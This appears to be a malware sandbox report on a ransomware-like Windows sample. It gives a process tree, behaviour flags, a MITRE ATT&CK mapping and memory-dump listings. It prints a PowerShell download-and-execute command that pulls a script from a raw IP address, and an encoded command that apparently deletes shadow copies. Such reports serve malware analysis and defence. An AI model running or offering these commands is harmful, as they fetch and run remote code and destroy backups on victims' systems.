72c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\5356d4234ccf138172e7820bde48cb1d.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/5356d4234ccf138172e7820bde48cb1d');Invoke-XIBCXTXJVNEI;Start-Sleep -s 10000"
2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies system certificate store
PID:1608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1872

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1580

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/1608-5-0x0000000001310000-0x0000000001311000-memory.dmp

Filesize
4KB

Download
memory/1608-21-0x0000000006290000-0x0000000006291000-memory.dmp

Filesize
4KB

Download
memory/1608-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/1608-14-0x0000000006150000-0x0000000006151000-memory.dmp

Filesize
4KB

Download
memory/1608-13-0x0000000006080000-0x0000000006081000-memory.dmp

Filesize
4KB

Download
memory/1608-8-0x0000000005FD0000-0x0000000005FD1000-memory.dmp

Filesize
4KB

Download
memory/1608-0-0x0000000000000000-mapping.dmp

Download
memory/1608-4-0x0000000001110000-0x0000000001111000-memory.dmp

Filesize
4KB

Download
memory/1608-3-0x0000000004A20000-0x0000000004A21000-memory.dmp

Filesize
4KB

Download
memory/1608-2-0x00000000009B0000-0x00000000009B1000-memory.dmp

Filesize
4KB

Download
memory/1608-1-0x00000000738C0000-0x0000000073FAE000-memory.dmp

Filesize
6.9MB

Download
memory/1872-23-0x0000000000000000-mapping.dmp

Download
memory/1872-25-0x00000000738C0000-0x0000000073FAE000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads